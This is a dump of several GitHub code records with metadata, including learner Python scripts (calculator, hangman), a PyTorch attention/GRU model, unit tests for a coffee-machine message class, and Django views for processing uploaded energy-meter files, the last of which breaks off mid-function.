dict_len(item, count)\r\n branches[-1] += count\r\n # если нет ветвей, то длина 0, 1 прибавили при добавлении значения в список\r\n if not branches:\r\n count = 0\r\n else:\r\n # если есть ветви, берем максимальную\r\n count = max(branches)\r\n # возвращаем максимальную ветвь\r\n return count\r\n","repo_name":"FoRBeR/Dictionary-nesting-depth","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39476466228","text":"def soma():\n x = input('Digite o primeiro número: ')\n y = input('Digite o segundo número: ')\n soma = int(x) + int(y)\n print(f'A soma de {x} + {y} é {soma}')\n\ndef subtracao():\n x = input('Digite o primeiro número: ')\n y = input('Digite o segundo número: ')\n subtracao = int(x) - int(y)\n print(f'A subtracao de {x} - {y} é {subtracao}')\n\ndef multiplicacao():\n x = input('Digite o primeiro número: ')\n y = input('Digite o segundo número: ')\n multiplicacao = float(x) * float(y)\n print(f'A multiplicação de {x} * {y} é {multiplicacao}')\n\ndef divisao():\n x = input('Digite o primeiro número: ')\n y = input('Digite o segundo número: ')\n divisao = int(x)/int(y)\n print(f'A divisão de {x} / {y} é {divisao}')\n\nescolha=1\n\nwhile escolha:\n print('0. Sair')\n print('1. Somar')\n print('2. Subtrair')\n print('3. Multiplicação')\n print('4. Divisao ')\n\n escolha = int(input('Opção: '))\n\n if(escolha==1):\n soma()\n if(escolha==2):\n subtracao()\n if(escolha==3):\n multiplicacao()\n if(escolha==4):\n divisao()","repo_name":"Danielhlw/Estudos-Python","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41230058488","text":"import os\r\nimport time\r\n\r\n\r\n\r\nwhile 1>0:\r\n tentatives = 0\r\n dico_mot = []\r\n # on demande le mot à montrer puis on le met en minuscule.\r\n solution = input(\"Enter le mot qui permetra de jouer au pendu: \")\r\n solution_minuscule= x=solution.lower()\r\n os.system(\"cls\")\r\n time.sleep(0.5)\r\n dico_fautes = [\"\\n \\n \\n \\n \\n \\n \\n _|_\",\"\\n  | \\n |\\n | \\n |\\n |\\n _|_ \",\" ________ \\n  | \\n |\\n | \\n |\\n |\\n _|_ \",\" ________ \\n  | | \\n | 0\\n | \\n |\\n |\\n _|_ \",\" ________ \\n  | | \\n | 0\\n | /\\ \\n |\\n |\\n _|_ \",\" ________ \\n  | | \\n | 0\\n | /|\\ \\n | |\\n |\\n _|_ \",\" ________ \\n  | | \\n | 0\\n | /|\\ \\n | |\\n | / \\ \\n _|_ You Lost\"]\r\n tiret_bas = []\r\n \r\n # on va tester si les caractères correspondent à la liste acceptée.\r\n # ensuite on imprime le nombre de tirets bas correspondant au nombre\r\n # de lettres dans le mot.\r\n \r\n for i in range(len(solution_minuscule)):\r\n dico_mot.append(solution_minuscule[i])\r\n tiret_bas.append(\"_\")\r\n nb_caractere = len(solution)\r\n nb_lettre = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\",\"ç\",\"é\",\"è\",\"â\",\"ä\",\"ù\"]\r\n \r\n if dico_mot[i] not in nb_lettre:\r\n print(\"Erreur dans le mot que vous avez donné (rentré seulement des lettres svp !)\")\r\n solution = input('Entrez le mot à deviner: ')\r\n \r\n print(\"le mot a deviner est : \"+ len(solution_minuscule)*\"_ \")\r\n \r\n time.sleep(0.25)\r\n \r\n # le joueur commence à deviner et on lui dit si il a vrai ou si il a faux\r\n # en lui redonnant son nombre de tentatives\r\n\r\n while tentatives < 7 and \"_\" in tiret_bas :\r\n proposition = input(\"Proposez une lettre : \")\r\n lettres_trouvees = \"\"\r\n \r\n if proposition in solution and len(proposition) == 1:\r\n lettres_trouvees = lettres_trouvees + proposition\r\n print(\"Bonne lettre!\")\r\n \r\n for i in range(len(solution_minuscule)):\r\n l=[i for i in range(len(solution_minuscule)) if solution_minuscule[i]== proposition]\r\n \r\n for i in range(len(l)):\r\n tiret_bas[l[i]] = proposition\r\n print(\" \".join(tiret_bas))\r\n \r\n else:\r\n print(\"Raté, il vous reste \", 7 - tentatives, \" tentatives\")\r\n print(dico_fautes[tentatives])\r\n tentatives = tentatives + 1\r\n print(\" _ _ __ _ _ _ _ __ __ _ \\n( \\/ ) \\/ )( \\ / )( ( | ( \\ \\n ) ( O ) \\/ ( \\ /\\ /)(/ / \\n(__/ \\__/\\____/ (_/\\_|__)_)__) \\n \") \r\n cond_recommencer = input(\"voulez vous recommencer ? o/n \")\r\n cond_dict = [\"o\",\"n\"]\r\n \r\n if cond_recommencer in cond_dict:\r\n break\r\n \r\n else:\r\n os.system(\"cls\")\r\nprint(\"Au revoir.\")","repo_name":"thomas-corteval/pendu-nsi","sub_path":"jeu_du_pendu.py","file_name":"jeu_du_pendu.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6929610161","text":"# serializers.py\nfrom rest_framework import serializers\n\nfrom .models import Employee\nfrom .models import Department\n\nclass EmployeeSerializer(serializers.ModelSerializer):\n\tclass Meta:\n\t\tmodel = Employee\n\t\tfields = (\n\t\t\t'id', \n\t\t\t'first_name', \n\t\t\t'last_name',\n\t\t\t'position',\n\t\t\t'salary',\n\t\t\t'age',\n\t\t\t'department_id',\n\t\t)\n\nclass DepartmentCreateSerializer(serializers.ModelSerializer):\n\tclass Meta:\n\t\tmodel = Department\n\t\tfields = (\n\t\t\t'id', \n\t\t\t'department_name',\n\t\t\t'chief',\n\t\t)\n\nclass DepartmentListSerializer(serializers.ModelSerializer):\n\tdepartment_id = serializers.IntegerField()\n\t# department_name = serializers.CharField(source='department_id.department_name', default=None)\n\temployee_count = serializers.IntegerField()\n\tsalary_sum = serializers.DecimalField(10,2)\n\tclass Meta:\n\t\tmodel = Employee\n\t\tfields = (\n\t\t\t'department_id', \n\t\t\t'employee_count', \n\t\t\t'salary_sum', \n\t\t\t# 'department_name',\n\t\t)\n\n","repo_name":"cruithne-2292/project","sub_path":"app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74582759130","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.distributions.categorical import Categorical\r\n\r\n### Add block model components\r\nfrom models.attention_model import BaseModel\r\n\r\n\r\n# Function from https://github.com/ikostrikov/pytorch-a2c-ppo-acktr/blob/master/model.py\r\ndef init_params(m):\r\n classname = m.__class__.__name__\r\n if classname.find(\"Linear\") != -1:\r\n m.weight.data.normal_(0, 1)\r\n m.weight.data *= 1 / torch.sqrt(m.weight.data.pow(2).sum(1, keepdim=True))\r\n if m.bias is not None:\r\n m.bias.data.fill_(0)\r\n\r\nclass Block_model(nn.Module):\r\n def __init__(self, input_dim, top_k, block_hid_dim, att_layer_num, norm_type, device, bl_log_sig_min,\r\n bl_log_sig_max):\r\n super().__init__()\r\n\r\n self.input_dim = input_dim #64 (hs+hr+ha)\r\n\r\n ### Block latent variable(embedding) dimension\r\n self.block_hid_dim = block_hid_dim # 256\r\n self.block_mu_size = 64\r\n\r\n ### Attention selection\r\n self.top_k = top_k\r\n\r\n self.device = device\r\n self.bl_log_sig_min = bl_log_sig_min\r\n self.bl_log_sig_max = bl_log_sig_max\r\n\r\n activation = nn.Tanh()\r\n # activation = nn.ReLU()\r\n\r\n # Define block memory\r\n ## Blockwise RNN. For simplicity, we use GRU. However, LSTM can also be applied.\r\n #self.block_memory_rnn = nn.GRUCell(self.input_dim * self.top_k, self.block_hid_dim)\r\n self.block_memory_rnn = nn.GRU(input_size = self.input_dim * self.top_k,\r\n hidden_size = self.block_hid_dim,\r\n num_layers = 1,\r\n )\r\n\r\n ## Define Self-attention\r\n ## Note that the output dimension of self-attention is the same as input dimension due to Residual connection.\r\n ## 4 multi-heads\r\n self.att_model_q = BaseModel(hidden_dim=self.input_dim, num_layers=att_layer_num,\r\n norm_type=norm_type)\r\n\r\n ## Define mean of encoder\r\n self.block_mu = nn.Sequential(\r\n nn.Linear(self.block_hid_dim, self.block_hid_dim // 2),\r\n activation,\r\n nn.Linear(self.block_hid_dim // 2, self.block_mu_size)\r\n )\r\n\r\n ## Define stddev of decoder\r\n self.block_sig = nn.Sequential(\r\n nn.Linear(self.block_hid_dim, self.block_hid_dim // 2),\r\n activation,\r\n nn.Linear(self.block_hid_dim // 2, self.block_mu_size),\r\n # nn.Softplus()\r\n )\r\n\r\n ## Define p_theta model for self-normalized importance sampling\r\n self.self_norm_model = nn.Sequential(\r\n nn.Linear(self.input_dim * self.top_k + self.block_mu_size, self.input_dim),\r\n activation,\r\n nn.Linear(self.input_dim, 1)\r\n )\r\n\r\n # Initialize parameters correctly\r\n self.apply(init_params)\r\n\r\n def forward(self, obs_block_ori, block_memory_ori):\r\n ## obs_block_ori: [ seq=L, batch=16, 64(feature)]\r\n ## block_memory_ori: [16, self.block_hid_dim=256]\r\n\r\n\r\n obs_block = obs_block_ori.clone()\r\n #print(\"obs_block\", obs_block.shape)\r\n assert len(obs_block.size()) == 3\r\n\r\n block_memory = block_memory_ori.clone()\r\n #print(\"block_memory (hidden)\", block_memory.shape)\r\n assert len(block_memory.size()) == 3\r\n\r\n # print(\"block_memory first\", block_memory_ori)\r\n\r\n # Step 1. input obs and action to Attention for model_q.\r\n # Then select some of them. Default is to choose 2 ends like bi-LSTM (block_len >=2).\r\n # Later, we are going to choose 'self.trans_select_N' number of outputs based on Attention score.\r\n\r\n trans_q_output, attention_matrix = self.att_model_q.forward(obs_block) # (seq, batch_size=4, 64)\r\n trans_q_output = trans_q_output.permute(1, 0, 2) # (batch=4, seq, 256)\r\n # print(\"trans_q_output\", trans_q_output, trans_q_output.shape) # (batch, seq, hidden_dim=64)\r\n # print(\"attention\", attention_matrix, attention_matrix.shape) # (batch*n_head, trans_seq, trans_seq)\r\n\r\n attention_matrix_align = torch.cat(attention_matrix.split(obs_block.size()[1], dim=0),\r\n 2) # (batch, trans_seq, trans_seq*n_head)\r\n\r\n ### Pass top K elements\r\n batch_here = trans_q_output.shape[0]\r\n seq_len_here = trans_q_output.shape[1]\r\n\r\n _, top_k_index = torch.topk(attention_matrix_align.sum(dim=-1), k=min(self.top_k, seq_len_here), dim=-1)\r\n\r\n top_k_index_repeat = top_k_index.unsqueeze(dim=-1).repeat(1, 1, trans_q_output.shape[2])\r\n # (batch, min(self.top_k, trans_q_output.shape[1]), 256)\r\n top_k_q_output_selected = torch.gather(trans_q_output, dim=1, index=top_k_index_repeat) # selected vectors\r\n # (batch, min(self.top_k, trans_q_output.shape[1]), 256)\r\n\r\n reshaped = torch.reshape(top_k_q_output_selected,\r\n (batch_here, -1)) # (batch, min(self.top_k, trans_q_output.shape[1])*256)\r\n # print(\"reshaped init\", reshaped, reshaped.shape) Y_ns\r\n\r\n ## Padding if necessary\r\n if seq_len_here < self.top_k:\r\n zero_pad = torch.zeros((batch_here, (self.top_k - seq_len_here) * trans_q_output.shape[2]),\r\n device=self.device)\r\n reshaped = torch.cat((reshaped, zero_pad), dim=-1) # (batch, self.top_k*256)\r\n\r\n # Step 2. Here, 'block_memory' should be changed to block_variable recurrently.\r\n reshaped = reshaped.unsqueeze(dim=0) #the input sequence(Y) length is always 1\r\n #print('reshaped(input)', reshaped.shape)\r\n #print('block_memory', block_memory.shape)\r\n\r\n output, hidden = self.block_memory_rnn(reshaped, block_memory) # (batch, hidden=256),\r\n\r\n #print('output', output.shape)\r\n #print('hidden', hidden.shape)\r\n\r\n return output, hidden\r\n #block_memory_ori = block_memory\r\n #return block_memory_ori, reshaped\r\n\r\n\r\n\r\n def block_mu_sig(self, block_memory):\r\n sig = torch.exp(self.block_sig(block_memory).clamp(self.bl_log_sig_min, self.bl_log_sig_max))\r\n\r\n return torch.cat((self.block_mu(block_memory), sig), dim=-1)","repo_name":"suyoung-lee/SDVT","sub_path":"models/block_model.py","file_name":"block_model.py","file_ext":"py","file_size_in_byte":6291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"19158369073","text":"#!/usr/bin/env python\n# pylint: disable=no-self-use,unused-argument\n'''\nUnit test cases for the Rocket message module.\n'''\n\n__all__ = (\n 'TestMessage',\n)\n\nimport logging\nfrom unittest import TestCase, main\n\nfrom rocket_r60v.message import Message\nfrom rocket_r60v.exceptions import MessageLengthError\n\nlogging.disable()\n\n\nclass TestMessage(TestCase):\n '''\n Test rocket.machine.Machine class and its methods.\n '''\n\n def _test_message(self, expected, **kwargs):\n '''\n Test if created message instance matches the expected message format.\n '''\n message = Message(**kwargs)\n\n self.assertEqual(expected, str(message), 'Mismatch of string representation')\n self.assertEqual(expected, message.raw_message, 'Mismatch of raw message w/ checksum')\n self.assertEqual(expected[0:-2], message.message, 'Mismatch of message w/o checksum')\n self.assertEqual(expected[0:9], message.envelope, 'Mismatch of envelope')\n self.assertEqual(expected[0], message.command, 'Mismatch of command')\n self.assertEqual(int(expected[1:5], 16), message.address, 'Mismatch of address')\n self.assertEqual(int(expected[5:9], 16), message.length, 'Mismatch of length')\n self.assertEqual(expected[9:-2], message.data, 'Missmatch of data')\n self.assertEqual(expected.encode(), message.encode(), 'Missmatch of encoded message')\n\n def test_read_from_first_address(self):\n '''\n Read from the first address.\n '''\n self._test_message(\n expected='r00010001F4',\n command='r',\n address=1,\n length=1\n )\n\n def test_read_from_tenth_address(self):\n '''\n Read from the tenth address.\n '''\n self._test_message(\n expected='r000A000104',\n command='r',\n address=10,\n length=1\n )\n\n def test_write_list_data_to_first_address(self):\n '''\n Write to the first address with a list of data.\n '''\n self._test_message(\n expected='w00010001015A',\n command='w',\n address=1,\n length=1,\n data=[1]\n )\n\n def test_write_int_data_to_first_address(self):\n '''\n Write to the first address with an int as data.\n '''\n self._test_message(\n expected='w00010001015A',\n command='w',\n address=1,\n length=1,\n data=1\n )\n\n def test_write_str_data_to_first_address(self):\n '''\n Write to the first address with an int as data.\n '''\n self._test_message(\n expected='w00010001015A',\n command='w',\n address=1,\n length=1,\n data='1'\n )\n\n def test_write_list_data_to_sixth_address(self):\n '''\n Write to the sixth address with a list of data.\n '''\n self._test_message(\n expected='w003C0001106F',\n command='w',\n address=60,\n length=1,\n data=[16]\n )\n\n def test_write_int_data_to_sixth_address(self):\n '''\n Write to the sixth address with an int as data.\n '''\n self._test_message(\n expected='w003C0001106F',\n command='w',\n address=60,\n length=1,\n data=16\n )\n\n def test_write_str_data_to_sixth_address(self):\n '''\n Write to the sixth address with an int as data.\n '''\n self._test_message(\n expected='w003C0001106F',\n command='w',\n address=60,\n length=1,\n data='16'\n )\n\n def test_write_long_list_data(self):\n '''\n Write a long list of data with matching length.\n '''\n self._test_message(\n expected='w003C00040A141E28C7',\n command='w',\n address=60,\n length=4,\n data=[10, 20, 30, 40]\n )\n\n def test_write_too_short_list_data(self):\n '''\n Write a too short list of data.\n '''\n with self.assertRaises(MessageLengthError):\n Message(\n command='w',\n address=60,\n length=4,\n data=[10, 20, 30]\n )\n\n def test_write_too_long_list_data(self):\n '''\n Write a too long list of data.\n '''\n with self.assertRaises(MessageLengthError):\n Message(\n command='w',\n address=60,\n length=4,\n data=[10, 20, 30, 40, 50]\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"confirm/Rocket-R60V","sub_path":"rocket_r60v/tests/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"4724323857","text":"from django.shortcuts import render\nimport json\nfrom django.core import serializers\nimport os\nimport zipfile\nfrom django.conf import settings\nfrom datetime import datetime\nimport shutil\nimport pandas as pd\n# Create your views here.\nfrom django.core.files import File\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n# from .serializers import AllMeterFilesSerializer\n\nfrom .models import *\nfrom .extract import dirJsonNPC\nfrom .merge import mergeNPCs\nfrom .dateFilter import dateFilterMergedFile\nfrom .validate import validateFile\nfrom .realMeterMWH import createRealMeterMWH\nfrom .frequencyGraphData import frequencyGraphData\nfrom .fictMeterMWH import createFictMeterMWH\nfrom .finalOutput import createFinalOutput\nfrom .analyseData import fetchData\nfrom .changeMeterDataAnalyse import changeMeterEndDataWithEquation,revertMeterEndChanges,zeroFillMeter\nfrom .componentWiseAnalysis import componentWiseMeterAnalysis\nfrom .specialReports import specialReport1\n\n\nfrom .supportingFunctions import *\nfrom django.core.files.storage import FileSystemStorage\n\nclass OverwriteStorage(FileSystemStorage):\n def get_valid_name(self, name):\n # return get_valid_filename(name)\n return name\n def get_available_name(self, name,max_length=None):\n if self.exists(name):\n print(name)\n os.remove(os.path.join(settings.MEDIA_ROOT, name))\n return name\n\ndef meterChangeLog(file_name, text_to_append):\n \"\"\"Append given text as a new line at the end of file\"\"\"\n # Open the file in append & read mode ('a+')\n with open(file_name, \"a+\") as file_object:\n # Move read cursor to the start of file.\n file_object.seek(0)\n # If file is not empty then append '\\n'\n data = file_object.read(100)\n if len(data) > 0:\n file_object.write(\"\\n\")\n # Append text at the end of file\n file_object.write(text_to_append)\n\n######################### Testing ##########################################################################\ndef index(request):\n return HttpResponse(\"Hello, world. You're at the polls index.\")\n\n@api_view(['GET'])\ndef apiOverview(request):\n\tapi_urls = {\n\t\t'List':'/task-list/',\n\t\t'Detail View':'/task-detail//',\n\t\t'Create':'/task-create/',\n\t\t'Update':'/task-update//',\n\t\t'Delete':'/task-delete//',\n\t\t}\n\n\treturn Response(api_urls)\n\n####################### Zipped Meter Data ####################################################################\n@csrf_exempt\ndef getAllMeterData(request):\n # AllMeterFiles_json = AllMeterFiles.objects.all()\n AllMeterFiles_json = serializers.serialize(\"json\", AllMeterFiles.objects.all().order_by('-id'))\n \n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(AllMeterFiles_json, content_type=\"text/json-comment-filtered\")\n\n@csrf_exempt\ndef getMeterData(request, meter_id): # Data of single meter\n meterData = AllMeterFiles.objects.filter(id=int(meter_id))\n meterData_json = serializers.serialize(\"json\", meterData)\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(meterData_json, content_type=\"text/json-comment-filtered\")\n\n@csrf_exempt\ndef addNewMeterFile(request):\n print(\"I have request object\")\n print(request.POST['year'])\n print(request.POST['month'])\n print(request.POST['startDate'])\n print(request.POST['endDate'])\n print(datetime.strptime(request.POST['startDate'], \"%d-%m-%Y\"))\n print(datetime.strptime(request.POST['endDate'], \"%d-%m-%Y\"))\n\n # print(request.POST['meterZippedFile'].name)\n\n year = request.POST['year']\n month = request.POST['month']\n startDate = datetime.strptime(request.POST['startDate'], \"%d-%m-%Y\")\n endDate = datetime.strptime(request.POST['endDate'], \"%d-%m-%Y\")\n meterZippedFile = request.FILES['meterZippedFile']\n\n meterData = AllMeterFiles.objects.create(year=year, month=month,status = \"Uploaded\", startDate=startDate, endDate=endDate)\n meterData.save()\n meterData.zippedMeterFile = meterZippedFile\n meterData.save()\n\n return HttpResponse(json.dumps({'id' : meterData.id, 'message': 'MeterFile added'}), content_type='application/json')\n\n@csrf_exempt\ndef deleteNewMeterFile(request,meter_id):\n print(meter_id)\n AllMeterFiles.objects.get(id=int(meter_id)).delete()\n return HttpResponse({'message': 'Meter deleted'}, status=200)\n\n########################### Extract ##########################################################################\n\n@csrf_exempt\ndef getNPCData(request, meter_id): # Data of single meter\n\n print(\"inside getNPCData\")\n print(meter_id)\n\n npcFiles = list(filter(lambda npcFile: (npcFile.npcFileMeterId() == meter_id),NpcFile.objects.all()))\n # npcFile = npcFiles[0]\n # npcDict = json.loads(npcFile.npcDictionary)\n # print(npcDict[\"1\"])\n npcFiles_json = serializers.serialize(\"json\", npcFiles , fields=('dirStructureNPC','meterFile'))\n \n return HttpResponse(npcFiles_json, content_type=\"text/json-comment-filtered\")\n\n\n\n\n@csrf_exempt\ndef extract(request,meter_id):\n \n try :\n print(\"inside extract\")\n\n print(\"meter_id\")\n print(meter_id)\n meterData = AllMeterFiles.objects.get(id=meter_id)\n print(meterData.zippedMeterFile)\n # zipFilePath = os.path.join(\"fifteenmmdp/media/\",str(meterData.zippedMeterFile))\n # npcFilesFolderPath = os.path.join(\"fifteenmmdp/media/meterFile/meterFile\"+meter_id,'NPC Files',os.path.basename(str(meterData.zippedMeterFile)))\n npcFilesFolderPath = os.path.join(\"fifteenmmdp/media/meterFile/meterFile\"+meter_id,'NPC Files')\n\n # print(os.path.splitext(zipFilePath)) # ('fifteenmmdp/media/meterFile/meterFile29/test', '.zip')\n print(npcFilesFolderPath)\n print(os.path.splitext(npcFilesFolderPath)) # ('meterFile/meterFile29\\\\NPC Files\\\\test', '.zip')\n\n with zipfile.ZipFile('fifteenmmdp/media/'+ str(meterData.zippedMeterFile), 'r') as zip_ref:\n # zip_ref.extractall(\"fifteenmmdp/media/meterFile/meterFile\"+ meter_id)\n zip_ref.extractall(\"fifteenmmdp/media/meterFile/meterFile\"+ meter_id +\"/NPC Files\")\n\n\n if(not (meterData.status is None) and (statusCodes.index(meterData.status) == 0)) :\n shutil.copytree('fifteenmmdp/media/necessaryFiles', \"fifteenmmdp/media/meterFile/meterFile\"+ meter_id +\"/NPC Files/Necessary Files Local Copy\")\n\n\n print(\"Extract executed\")\n\n npcDict = {'lastIndex' : 1}\n\n jsonOutput = dirJsonNPC(os.path.splitext(npcFilesFolderPath)[0],meterData,npcDict)\n print(json.dumps(jsonOutput))\n print(npcDict)\n\n npcFileObject = NpcFile.objects.create(npcDictionary = json.dumps(npcDict),dirStructureNPC=json.dumps(jsonOutput), meterFile = meterData)\n npcFileObject.save()\n\n AllMeterFiles.objects.filter(id = meter_id).update(status=\"Extracted\")\n return HttpResponse({'message': 'Meter File Extracted'}, status=200)\n except Exception as e :\n return HttpResponse(json.dumps([str(e)]), content_type='application/json',status=500)\n\n\n\n# @csrf_exempt\n# def downloadNPCFile(request,npc_id):\n\n print(\"inside downloadNpcFile\")\n print(npc_id)\n npcFile = NpcFile.objects.get(id=int(npc_id))\n\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,npcFile.filePath)\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + npcFile.fileName\n return response\n\n return HttpResponse(\"There is no NPC File to download\")\n\n\n@csrf_exempt\ndef downloadNPCFile(request,meter_id,npc_id): # Single File only\n\n print(\"inside downloadNPCFile\")\n print(npc_id)\n # npcFile = NpcFile.objects.get(id=int(npc_id))\n\n npcFiles = list(filter(lambda npcFile: (npcFile.npcFileMeterId() == meter_id),NpcFile.objects.all()))\n npcFile = npcFiles[0]\n npcDict = json.loads(npcFile.npcDictionary)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,npcDict[npc_id])\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(npcDict[npc_id])\n return response\n\n return HttpResponse(\"There is no NPC File to download\")\n\n\n# @csrf_exempt\n# def changeNPCFile(request,npc_id):\n\n print(\"inside changeNPCFile\")\n print(npc_id)\n\n print(request.FILES['fileToUpload'])\n # npcFileToChange = NpcFile.objects.get(id = npc_id)\n # npcFileToChange.npcFile = request.FILES['fileToUpload']\n # npcFileToChange.save()\n return HttpResponse({'message': 'NPC Changed'}, status=200)\n\n@csrf_exempt\ndef changeNPCFile(request,meter_id,npc_id):\n\n print(\"inside changeNPCFile\")\n print(npc_id)\n\n print(request.FILES['fileToUpload'])\n myfile = request.FILES['fileToUpload']\n\n print(myfile)\n print(myfile.name)\n npcFiles = list(filter(lambda npcFile: (npcFile.npcFileMeterId() == meter_id),NpcFile.objects.all()))\n npcFile = npcFiles[0]\n npcDict = json.loads(npcFile.npcDictionary)\n print(npcDict[npc_id])\n # useThisLoc = 'fifteenmmdp/media'+npcDict[npc_id]\n useThisLoc = npcDict[npc_id]\n\n fs = OverwriteStorage()\n fs.save(useThisLoc, myfile)\n # realMeterMWHFileToChange.npcFile = request.FILES['fileToUpload']\n # realMeterMWHFileToChange.save()\n return HttpResponse({'message': 'NPCFile Changed'}, status=200)\n\n########################### Merge ##########################################################################\n@csrf_exempt\ndef merge(request,meter_id):\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n mergeError = mergeNPCs(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n if(len(mergeError) != 0) :\n return HttpResponse(json.dumps(mergeError), content_type='application/json',status=500)\n else :\n return HttpResponse({'message': 'NPCs Merged'}, status=200)\n \n\n@csrf_exempt\ndef getMergedFile(request,meter_id):\n\n print(\"inside getMergedFile\")\n print(meter_id)\n\n mergedFile = list(filter(lambda mergedFile: (mergedFile.mergedFileMeterId() == meter_id),MergedFile.objects.all()))\n \n mergedFile_json = serializers.serialize(\"json\", mergedFile)\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(mergedFile_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef downloadMergedFile(request,mergedFile_id):\n\n print(\"inside downloadMergedFile\")\n\n print(mergedFile_id)\n mergedFile = MergedFile.objects.get(id=int(mergedFile_id))\n\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,mergedFile.filePath)\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + mergedFile.fileName\n return response\n\n return HttpResponse(\"There is no Merged File to download\")\n\n@csrf_exempt\ndef changeMergedFile(request,mergedFile_id):\n\n print(\"inside changeMergedFile\")\n\n print(request.FILES['fileToUpload'])\n mergedFileToChange = MergedFile.objects.get(id = mergedFile_id)\n mergedFileToChange.mergedFile = request.FILES['fileToUpload']\n mergedFileToChange.save()\n print(mergedFile_id)\n return HttpResponse({'message': 'Merged File Changed'}, status=200)\n\n############################## Date Filter #####################################################################\n\n@csrf_exempt\ndef dateFilter(request,meter_id):\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n dateFilterError = dateFilterMergedFile(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n if(len(dateFilterError) != 0) :\n return HttpResponse(json.dumps(dateFilterError), content_type='application/json',status=500)\n else :\n #Need to fix \n return HttpResponse({'message': 'MergedFile DateFiltered'}, status=200)\n\n\n@csrf_exempt\ndef getDateFilteredFile(request,meter_id):\n\n print(\"inside getDateFilteredFile\")\n print(meter_id)\n\n dateFilteredFile = list(filter(lambda dateFilteredFile: (dateFilteredFile.dateFilteredFileMeterId() == meter_id),DateFilteredFile.objects.all()))\n \n dateFilteredFile_json = serializers.serialize(\"json\", dateFilteredFile)\n # data = {\"data\": AllMeterFiles_json}\n # return JsonResponse(data)\n return HttpResponse(dateFilteredFile_json, content_type=\"text/json-comment-filtered\")\n\n\n@csrf_exempt\ndef downloadDateFilteredFile(request,dateFilteredFile_id):\n\n print(\"inside downloadDateFilteredFile\")\n\n print(dateFilteredFile_id)\n dateFilteredFile = DateFilteredFile.objects.get(id=int(dateFilteredFile_id))\n\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,dateFilteredFile.filePath)\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + dateFilteredFile.fileName\n return response\n\n return HttpResponse(\"There is no DateFiltered File to download\")\n\n@csrf_exempt\ndef changeDateFilteredFile(request,dateFilteredFile_id):\n\n print(\"inside changeDateFiltered\")\n\n print(request.FILES['fileToUpload'])\n dateFilteredFileToChange = DateFilteredFile.objects.get(id = dateFilteredFile_id)\n dateFilteredFileToChange.dateFilteredFile = request.FILES['fileToUpload']\n dateFilteredFileToChange.save()\n print(dateFilteredFile_id)\n return HttpResponse({'message': 'DateFiltered File Changed'}, status=200)\n\n@csrf_exempt\ndef downloadNrxFile(request,meter_id):\n\n print(\"inside downloadNrxFile\")\n\n print(meter_id)\n\n outputFile_path = os.path.join(settings.MEDIA_ROOT,'meterFile/meterFile'+meter_id+\"/DateFiltered File/NRXFile.NRX\")\n print(outputFile_path)\n\n if(os.path.exists(outputFile_path)) :\n with open(outputFile_path, 'rb') as fh:\n response = HttpResponse(fh.read(), content_type=\"text/plain\")\n response['Content-Disposition'] = 'attachment; filename=' + 'NRXFile.NRX'\n return response\n\n return HttpResponse(\"There is no NRX File to download\")\n\n############################ Validate ##############################################################################\n\n@csrf_exempt\ndef validate(request,meter_id):\n try :\n print(meter_id)\n meterFile = AllMeterFiles.objects.get(id=int(meter_id))\n print(meterFile.status)\n valiDateError = validateFile(path = \"meterFile\"+meter_id, _meterData = meterFile) #Path given\n if(len(valiDateError) != 0) :\n return HttpResponse(json.dumps(valiDateError), content_type='application/json',status=500)\n else :\n #Need to fix \n return HttpResponse({'message': 'MergedFile Validated'}, status=200)\n 